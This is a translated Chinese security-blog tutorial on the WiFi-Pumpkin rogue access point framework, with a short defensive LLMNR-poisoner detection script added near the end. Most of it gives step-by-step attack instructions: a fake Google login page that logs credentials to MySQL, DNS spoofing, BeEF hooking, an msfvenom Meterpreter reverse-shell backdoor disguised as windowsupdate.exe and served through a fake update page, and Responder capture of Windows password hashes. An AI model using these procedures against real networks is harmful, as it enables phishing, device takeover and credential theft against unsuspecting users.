*Original author: blacksunny. This article is part of the FreeBuf original reward program; reprinting without permission is prohibited.
Description
WiFi-Pumpkin is a complete framework for wireless penetration testing. It forges wireless access points to carry out man-in-the-middle attacks and also supports a number of other wireless penetration testing functions. The tool can be used to monitor the traffic of a target user, and it can lure unsuspecting users through wireless phishing, so that the target's data traffic can be observed.
Main functions
- Rogue Wi-Fi Access Point
- Deauth Attack Clients AP
- Probe Request Monitor
- DHCP Starvation Attack
- Credentials Monitor
- Transparent Proxy
- Windows Update Attack
- Phishing Manager
- Partial Bypass HSTS protocol
- Support BeEF hook
- ARP Poison
- DNS Spoof
- Patch Binaries via MITM
- Karma Attack (supports hostapd-mana)
- LLMNR, NBT-NS and MDNS poisoner (Responder)
- Pumpkin-Proxy (ProxyServer (mitmproxy API))
- Capture images on the fly
- TCP-Proxy (with scapy)
Plug-ins
Transparent Proxy:
The transparent proxy lets the user intercept and modify traffic and, at the same time, inject JavaScript into the target page. Injection is modular: create a Python file in the plugins/extension/ directory and its output is shown under the Pumpkin-Proxy tab.
TCP-Proxy Server
This plug-in places a proxy inside a TCP stream. It filters the request and response streams with the scapy module and actively modifies the packets of the TCP protocol that are intercepted. Modules are used to view or modify the intercepted data: simply add your custom module under plugins/analyzers/ and it will be listed in the TCP-Proxy tab automatically.
Install WiFi-Pumpkin
- git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
- pip install -r requirements.txt
- ./installer.sh --install
- Run WiFi-Pumpkin: python wifi-pumpkin.py
Create a phishing page
Set up MySQL
- /etc/init.d/mysql start
- mysql -u root
- create database xeus;
- use xeus;
- create table logins(network varchar(64), email varchar(64), password varchar(64));
Download the fake page
- git clone https://github.com/XeusHack/Fake-Login-Page.git
- Put the fake login page files in the /var/www directory.
- Edit the database.php file and set its contents:
$username = "root";
$password = "";
$db_name = "xeus";
$tbl_name = "logins";
Set these values according to your own environment; the values above are from mine.
Restart MySQL: /etc/init.d/mysql restart
Set up WiFi-Pumpkin
Run WiFi-Pumpkin: enter its directory and run python wifi-pumpkin.py.
Switch to the Settings tab, where you can set the SSID and channel. Here I keep the default SSID pumpap on channel 11, and I enable wireless security with the password 1234567890. Note: NetworkAdapter is the name of the wireless network card; you need a separate wireless card for this.
Then scroll down; the default DHCP server settings are shown there, and they can be left as they are.
Disable the proxy: click Plugins next to it and deselect the proxy server, as shown in the figure.
Click Start, and the wireless hotspot with the SSID pumpap appears on the mobile phone, shown as encrypted. Enter the password set above, 1234567890, and the phone connects.
Then click DNS Spoofer under Modules to open its page. Using the default spoofed domain example.com as the example, click Start attack so that DNS spoof is running.
Select the Phishing Manager module, choose index.html under Options, and click Start server. When the mobile client connected to the pumpap hotspot browses to example.com, the configured page appears.
Then select Set directory, as shown in the figure, set the path of the fake login page prepared above as the env path, and click Start server. The forged page can now be seen on the mobile client.
Enter an e-mail address and password on the fake Google page above, then query the logins table in MySQL to see the captured information.
Attacking with BeEF
Run ./beef in the /usr/share/beef-xss directory, as shown in the figure, and take note of the hook URL.
Then log in to BeEF at http://127.0.0.1:3000/ui/authentication. The default user name and password are both beef.
Follow the process above to set up the pumpap wireless hotspot, open the Phishing Manager module, and configure it as shown in the figure.
Then click Start server. Connect to the pumpap hotspot on the mobile client and open example.com; the hooked machine appears in the BeEF page, from which further BeEF modules can be run against it.
Reverse shell
Generate a shellcode backdoor with msfvenom: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your local IP address> LPORT=4444 -f exe -o windowsupdate.exe. Then open msfconsole and wait for the shell to connect back.
Following the WiFi-Pumpkin setup above, open the DNS Spoofer page, delete the example.com entry under DNS spoof, and enter a domain of your own (I still use example.com here). Note that the earlier example.com entry must be deleted first; otherwise the port stays occupied and the following step will not succeed.
On the DNS Spoofer page, select Fake Update to open its page and add your shellcode backdoor under this path. You can choose either a Windows Update or a Java Update page. For the network adapter, choose wlan0, your own wireless card.
Then connect the target machine to my fake pumpap hotspot and browse to example.com; the forged update page selected above appears.
The Java update page is shown below.
If the target machine downloads and installs our backdoor, we obtain control of it from Kali.
Stealing Account Password Hashes
Run WiFi-Pumpkin and select Responder under Advanced Mode: Monitor MITM attack on the interface, as shown in the figure.
Then select Responder under Plugins and turn off Enable proxy server. The configuration page can be opened under Change (the defaults are generally fine; you can also enable or disable options depending on what you want to capture), as shown in the figure.
Our main purpose is to capture Windows account names and passwords: perform the operation above on the target machine, and its user name and password hash are displayed in the WiFi-Pumpkin Responder panel.
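As an added defender-side example (not part of the article or of WiFi-Pumpkin), the following Python probe detects an LLMNR poisoner such as Responder from a client on the same segment: it asks the link-scope multicast group to resolve a name nobody owns, so any reply echoing our transaction ID must be forged. The multicast address and port come from RFC 4795; the sample reply bytes and the 10.0.0.1 address are constructed for the offline check.

```python
import random
import socket
import struct
LLMNR_GROUP = ("224.0.0.252", 5355)   # RFC 4795 link-scope multicast group and port

def build_llmnr_query(name, txid):
    """Encode an LLMNR A-record query; the wire format is DNS-style (RFC 4795 sec. 2)."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)     # flags=0, QDCOUNT=1
    qname = b"".join(bytes([len(lbl)]) + lbl.encode() for lbl in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)           # QTYPE=A, QCLASS=IN

def _skip_name(data, pos):  # advance past a (possibly compressed) DNS name
    while data[pos] and data[pos] & 0xC0 != 0xC0:
        pos += data[pos] + 1
    return pos + (2 if data[pos] else 1)   # pointer is 2 bytes, terminator is 1

def parse_llmnr_answer(data, txid):
    """IPv4 addresses asserted in a reply to txid, or None if data is not such a reply."""
    if len(data) < 12:
        return None
    rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000 or an == 0:   # not a response to our probe
        return None
    pos, addrs = 12, []
    for _ in range(qd):                                 # skip the echoed question section
        pos = _skip_name(data, pos) + 4                 # + QTYPE + QCLASS
    for _ in range(an):
        pos = _skip_name(data, pos)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
        if rtype == 1 and rdlen == 4:                   # A record carrying the claimed IPv4
            addrs.append(socket.inet_ntoa(data[pos + 10:pos + 14]))
        pos += 10 + rdlen
    return addrs

def probe_for_poisoner(timeout=2.0):
    """Query a name nobody owns; a non-empty result means a poisoner claimed it."""
    txid = random.randrange(0x10000)
    bogus = "".join(random.choices("abcdefghijklmnopqrstuvwxyz", k=12))
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_llmnr_query(bogus, txid), LLMNR_GROUP)
        try:
            return parse_llmnr_answer(sock.recvfrom(1024)[0], txid) or []
        except socket.timeout:
            return []

# Constructed wire sample of a poisoner's reply (txid 0x1234 -> 10.0.0.1) for offline checks.
SAMPLE_POISONED_REPLY = (struct.pack("!HHHHHH", 0x1234, 0x8000, 1, 1, 0, 0)
                         + build_llmnr_query("canary", 0x1234)[12:]
                         + b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 30, 4) + bytes([10, 0, 0, 1]))
```

Run probe_for_poisoner() from a client joined to the suspect hotspot; a legitimate segment returns an empty list, while a list of addresses identifies the host answering for names it does not own.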
Conclusion:
The above was verified mainly by reference to the following articles:
http://www.freebuf.com/articles/network/137159.html
https://github.com/P0cL4bs/WiFi-Pumpkin